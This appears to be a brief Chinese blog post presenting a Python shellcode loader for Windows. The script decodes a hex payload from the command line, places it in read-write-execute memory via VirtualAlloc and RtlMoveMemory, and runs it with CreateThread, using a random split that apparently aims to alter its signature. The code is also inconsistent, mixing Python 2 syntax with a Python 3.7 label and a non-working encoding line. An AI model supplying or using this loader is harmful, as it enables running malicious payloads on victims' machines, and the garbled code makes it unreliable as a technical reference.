本文介绍了如何使用Python将接收到的十六进制字符串解码为字节序列,并通过VirtualAlloc和RtlMoveMemory进行内存分配和复制,最终创建并执行shellcode。涉及了ctypes库、内存管理以及Windows API调用。
#字符串转十六进制
python3.7
import codecs
codecs.encode(“shellcode”)
案例:
import ctypes
import sys
import random
decode = sys.argv[1].decode(“hex”)
n=random.randint(0,len(decode)-1)
shellcode = bytearray(decode[:n]+decode[n:])
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(len(shellcode)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(shellcode)))
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))
扫一扫
2713
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
